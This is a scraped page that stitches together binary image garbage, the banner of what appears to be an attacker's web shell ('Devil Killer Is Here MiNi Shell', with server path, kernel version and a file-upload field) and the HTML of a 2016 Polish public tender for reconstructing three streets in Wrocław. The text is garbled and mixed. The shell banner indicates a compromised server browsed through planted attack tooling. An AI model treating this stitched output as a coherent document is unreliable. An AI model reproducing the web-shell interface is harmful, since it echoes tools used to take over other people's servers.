JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/92378-N-2016.html

<p class="kh_header"><b>Wrocław: 03730 Przebudowa ul. Białodrzewnej, Bukowej oraz Grabowej we Wrocławiu: Część nr 1 - Przebudowa ul. Białodrzewnej i Bukowej we Wrocławiu, Część nr 2 - Przebudowa ul. Grabowej we Wrocławiu</b><br>
<b>Numer ogłoszenia: 92378 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wrocławskie Inwestycje sp. z o.o. , ul. Ofiar Oświęcimskich 36, 50-059 Wrocław, woj. dolnośląskie, tel. 71 77 10 905, faks 71 77 10 904.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wi.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 03730 Przebudowa ul. Białodrzewnej, Bukowej oraz Grabowej we Wrocławiu: Część nr 1 - Przebudowa ul. Białodrzewnej i Bukowej we Wrocławiu, Część nr 2 - Przebudowa ul. Grabowej we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa ul. Białodrzewnej, Bukowej oraz Grabowej we Wrocławiu  z podziałem na następujące  Części:1. Część nr 1 - Przebudowa ul. Białodrzewnej i Bukowej we Wrocławiu obejmuje w szczególności: 
a) przebudowę nawierzchni jezdni na odcinku objętym opracowaniem,
b) wykonanie robót ziemnych związanych z robotami drogowymi
c) budowę kanalizacji deszczowej
d) budowę kanalizacji sanitarnej
e) przebudowa sieci wodociągowej wraz z przyłączami
f) budowa spięć sieci wodociągowej
g)  budowę kanalizacji kablowej MTKK
h) budowę oświetlenia drogowego,
i) wyniesienie projektu organizacji ruchu docelowego
j) wykonanie wycinki zieleni i zabezpieczenie zieleni przeznaczonej do pozostawienia.
k) wykonanie nasadzeń zieleni i trawników oraz pielęgnacja w okresie gwarancyjnym
l) uporządkowanie i rekultywację terenu po robotach budowlanych wraz z likwidacją zaplecza budowy
m) wszelkie inne prace wynikające z przyjętych rozwiązań projektowych

2. Część nr 2 - Przebudowa ul. Grabowej we Wrocławiu obejmuje w szczególności:  
a) przebudowę nawierzchni jezdni na odcinku objętym opracowaniem,
b) wykonanie robót ziemnych związanych z robotami drogowymi
c) budowę kanalizacji deszczowej
d) budowę kanalizacji kablowej MTKK
e) budowę oświetlenia drogowego,
f) budowa sieci kanalizacji sanitarnej
g) budowa sieci wodociągowej
h) wyniesienie projektu organizacji ruchu docelowego
i) wykonanie wycinki zieleni i zabezpieczenie zieleni przeznaczonej do pozostawienia.
j) wykonanie nasadzeń zieleni i trawników oraz pielęgnacja w okresie gwarancyjnym
k) uporządkowanie i rekultywację terenu po robotach budowlanych wraz z likwidacją zaplecza budowy
l) wszelkie inne prace wynikające z przyjętych rozwiązań projektowych

Szczegółowy opis przedmiotu zamówienia w zakresie obu Części został przedstawiony w Części III Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego polegających na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.21.00-3, 45.23.24.10-9, 45.23.24.51-8, 45.23.24.60-4, 45.23.32.52-0, 45.23.32.53-7, 45.23.32.90-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca składający ofertę zobowiązany jest wnieść wadium w wysokości:

Część 1: 7 000,00 zł (słownie: siedem tysięcy złotych 00/100);
Część 2: 8 000,00 zł (słownie: osiem tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu:

1. posiadać wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia. Wykonawca musi spełniać następujące warunki dotyczące powyższych okoliczności (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie):
- dla części 1:
1.1. wykonać w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie polegające na budowie lub  przebudowie lub remoncie w terenie miejskim drogi co najmniej jednojezdniowej o długości co najmniej  200 m wraz z budową lub przebudową sieci uzbrojenia terenu co najmniej trzy branże spośród następujących: sieć wodociągowa, kanalizacja sanitarna lub ogólnospławna, kanalizacja deszczowa, elektroenergetyczna, teletechniczna, oświetlenie drogowe (przy czym Wykonawca jest zobowiązany wskazać, które branże z ww. były wykonywane) oraz
1.2. wykonać w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie polegające na budowie lub przebudowie sieci sanitarnej lub ogólnospławnej lub deszczowej o długości co najmniej 200 m i przebiegającej w terenie miejskim  oraz
1.3. wykonać w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie polegające na budowie lub przebudowie sieci wodociągowej o długości co najmniej 200 m i przebiegającej w terenie miejskim 
- dla części 2:
1.4. wykonać w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie polegające na budowie lub  przebudowie lub remoncie w terenie miejskim drogi co najmniej jednojezdniowej o długości co najmniej  400 m wraz z budową lub przebudową sieci uzbrojenia terenu co najmniej trzy branże spośród następujących: kanalizacja sanitarna lub ogólnospławna, kanalizacja deszczowa, elektroenergetyczna, teletechniczna, oświetlenie drogowe (przy czym Wykonawca jest zobowiązany wskazać, które branże z ww. były wykonywane) oraz
1.5. wykonać w okresie ostatnich 5 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedno zadanie polegające na budowie lub przebudowie sieci sanitarnej lub ogólnospławnej lub deszczowej o długości co najmniej 300 m i przebiegającej w terenie miejskim.

Uwaga: W przypadku ubiegania się przez Wykonawcę o obydwie części zamówienia (Część 1 i 2) Zamawiający uzna warunki, o których mowa w pkt. III.3.2) ppkt. 1.1. - 1.5 powyżej za spełnione, jeżeli Wykonawca wykaże, spełnienie warunków, o których mowa w pkt. III.3.2) ppkt. 1.3.-1.5 powyżej.
Zamawiający pod pojęciem teren miejski, o którym mowa powyżej  rozumie teren zabudowany, posiadający uzbrojenie podziemne, położony w granicach administracyjnych miasta. 
  
Pod pojęciem budowa, przebudowa, remont o których mowa powyżej Zamawiający rozumie zgodnie z definicją zawartą w art. 3 pkt. 6), 7a), 8) ustawy prawo budowlane (tj. Dz. U. z 2016, poz. 290).
 
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie analizy dokumentów załączonych do oferty wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu: posiadać wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania niniejszego zamówienia. Wykonawca musi spełniać następujące warunki dotyczące powyższych okoliczności (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie): wskazać do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych  do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz podać informacje o podstawie do dysponowania tymi osobami;

- dla części 1:
1. Kierownik budowy: (1 osoba) posiadający min. 2 lata doświadczenia na stanowisku kierownika budowy lub kierownika robót podczas realizacji robót drogowych (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym),  posiadający uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń w specjalności inżynieryjnej drogowej,  o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016, poz. 290)  oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) oraz 
2. Kierownik robót drogowych - (1 osoba) posiadający min. 2 lata doświadczenia na stanowisku kierownika robót drogowych w tym podczas co najmniej jednego zadania polegającego na budowie lub  przebudowie lub remoncie w terenie miejskim drogi co najmniej jednojezdniowej o długości co najmniej  200 m wraz z budową lub przebudową sieci uzbrojenia terenu co najmniej trzy branże spośród następujących: sieć wodociągowa, kanalizacja sanitarna lub ogólnospławna, kanalizacja deszczowa, elektroenergetyczna, teletechniczna, oświetlenie drogowe (przy czym Wykonawca jest zobowiązany wskazać, które branże z ww. były wykonywane)  (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym), posiadający uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń  w specjalności inżynieryjnej drogowej,  o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016, poz. 290)  oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) oraz 
3. Kierownik robót w specjalności wodno-kanalizacyjnej: (1 osoba) posiadającego min. 2 letnie doświadczenie na stanowisku kierownika robót instalacyjnych w tym podczas co najmniej jednego zadania polegającego na budowie lub przebudowie sieci sanitarnej lub ogólnospławnej lub deszczowej o długości co najmniej 200 m i przebiegającej w terenie miejskim (przy czym Wykonawca jest zobowiązany wskazać, która sieć z ww. była wykonywana) (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym) oraz posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, o których mowa w ustawie z dnia 7 lipca 1994 r. (t.j. Dz. U. z 2016, poz. 290)   oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278)  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej  (Dz. U. 2016 r., poz. 65) 

- dla części 2:
4. Kierownik budowy: (1 osoba) posiadający min. 2 lata doświadczenia na stanowisku kierownika budowy lub kierownika robót podczas realizacji robót drogowych (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym),  posiadający uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń w specjalności inżynieryjnej drogowej,  o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016, poz. 290)  oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) oraz 
5. Kierownik robót drogowych - (1 osoba) posiadający min. 2 lata doświadczenia na stanowisku kierownika robót drogowych w tym podczas co najmniej jednego zadania polegającego na budowie lub  przebudowie lub remoncie w terenie miejskim  drogi co najmniej jednojezdniowej o długości co najmniej  400 m wraz z budową lub przebudową sieci uzbrojenia terenu co najmniej trzy branże spośród następujących: sieć wodociągowa, kanalizacja sanitarna lub ogólnospławna, kanalizacja deszczowa, elektroenergetyczna, teletechniczna, oświetlenie drogowe (przy czym Wykonawca jest zobowiązany wskazać, które branże z ww. były wykonywane)   (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym),  posiadający uprawnienia budowlane do kierowania robotami budowlanym bez ograniczeń  w specjalności inżynieryjnej drogowej,  o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016, poz. 290)  oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65) oraz 
6. Kierownik robót w specjalności wodno-kanalizacyjnej: (1 osoba) posiadającego min. 2 letnie doświadczenie na stanowisku kierownika robót instalacyjnych w tym podczas co najmniej jednego zadania polegającego na budowie lub przebudowie sieci sanitarnej lub ogólnospławnej lub deszczowej o długości co najmniej 300 m i przebiegającej w terenie miejskim (przy czym Wykonawca jest zobowiązany wskazać, która sieć z ww. była wykonywana) (doświadczenie Wykonawca wykaże wskazując od: miesiąc, rok - do miesiąc, rok; dopuszcza się sumowanie doświadczenia z różnych okresów z różnych zadań, natomiast okres 2 lat doświadczenia musi być okresem kalendarzowym) oraz posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, o których mowa w ustawie z dnia 7 lipca 1994 r. (t.j. Dz. U. z 2016, poz. 290)   oraz Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014  r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz. 1278)  lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub uznane przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej  (Dz. U. 2016 r., poz. 65).

Uwaga: W przypadku ubiegania się przez Wykonawcę o obydwie części zamówienia (Część 1 i 2) Zamawiający uzna warunki, o których mowa w pkt. III.3.4) ppkt 1. - 6 powyżej za spełnione, jeżeli Wykonawca wykaże, spełnienie warunków, o których mowa w pkt. III.3.4) ppkt 4. - 6 powyżej.

Ww. Funkcje mogą być łączone, jednak jedna osoba nie może pełnić więcej niż dwóch z ww. funkcji.

Zamawiający pod pojęciem teren miejski, o którym mowa powyżej  rozumie teren zabudowany, posiadający uzbrojenie podziemne, położony w granicach administracyjnych miasta. 
  
Pod pojęciem budowa, przebudowa, remont o których mowa powyżej Zamawiający rozumie zgodnie z definicją zawartą w art. 3 pkt. 6), 7a), 8) ustawy prawo budowlane (tj. Dz. U. z 2016, poz. 290). 

 Uwaga: W przypadku wskazania dla osób, o których mowa w pkt. III.3.4) ppkt 1 - 6 powyżej doświadczenia (od miesiąc-rok do miesiąc rok) zdobytego podczas realizacji w tym samym czasie (w tym samym okresie kalendarzowym) kilku zadań, Zamawiający podczas oceny spełniania warunku udziału w postępowaniu uzna doświadczenie tych osób - z okresów nakładających się ale wyłącznie dla jednego z ww. zadań tj. w powyższym przypadku Zamawiający nie będzie wliczał kilkakrotnie tego samego okresu kalendarzowego do obliczenia lat doświadczenia.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie analizy dokumentów załączonych do oferty wg formuły: spełnia - nie spełnia.

W przypadku wskazania osoby posiadającej uprawnienia budowlane wydane na terenie UE, mogą one uzyskać decyzję w sprawie uznania kwalifikacji zawodowych oraz wpis do stosownej izby na zasadach określonych w ustawą z dnia z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2016 r., poz. 65), oraz w Regulaminie postępowania w sprawie uznawania kwalifikacji zawodowych obywateli państw członkowskich Unii Europejskiej. Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o europejskim obszarze gospodarczym, którzy nabyli w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje odpowiadające uprawnieniom budowlanym w Polsce (Załącznik do uchwały Krajowej Rady Polskiej Izby Inżynierów Budownictwa nr 2/R/09 z dnia 28.01.2009 r). W razie uzyskania uznania kwalifikacji w zakresie wymaganym zgodnie z postanowieniami niniejszego punktu oraz wpisu do Izby Inżynierów Budownictwa uznaje się, że Wykonawca wykazał spełnienie warunków określonych w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy ubiegający się o zamówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu: Spełniać niżej określone warunki, dotyczące sytuacji ekonomicznej i finansowej (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu składane dokumenty mają dotyczyć tego lub tych z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku), to jest:

- dla części 1:
1. Wykonawca posiada środki finansowe w wysokości co najmniej 250 000,00 PLN lub posiada zdolność kredytową w wysokości co najmniej 250 000,00 PLN,

- dla części 2:
2. Wykonawca posiada środki finansowe w wysokości co najmniej 500 000,00 PLN lub posiada zdolność kredytową w wysokości co najmniej 500 000,00 PLN,

Uwaga: W przypadku ubiegania się przez Wykonawcę o obydwie części zamówienia (Część 1 i 2) Zamawiający wymaga aby Wykonawca wykazał posiadanie środków finansowych w wysokości co najmniej 750 000,00 PLN lub posiadanie zdolności kredytowej w wysokości co najmniej 750 000,00 PLN.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie analizy dokumentów załączonych do oferty wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>UWAGA: za najważniejsze roboty budowlane, Zamawiający uważa wszystkie te roboty, o których mowa:
-  w pkt. III.3.2)ppkt 1.1 - 1.3 ogłoszenia - dla Części 1
- w pkt. III.3.2) ppkt 1.4 - 1.5 ogłoszenia - dla Części 2

Uwaga: W przypadku ubiegania się przez Wykonawcę o obydwie części zamówienia (Część 1 i 2) za najważniejsze roboty budowlane Zamawiający uważa wszystkie te roboty, o których mowa w pkt. III.3.2) ppkt 1.3.- 1.5 niniejszego ogłoszenia.

Dowodami, o których mowa powyżej są: 
- poświadczenia, 
- inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczeń, o których mowa powyżej.

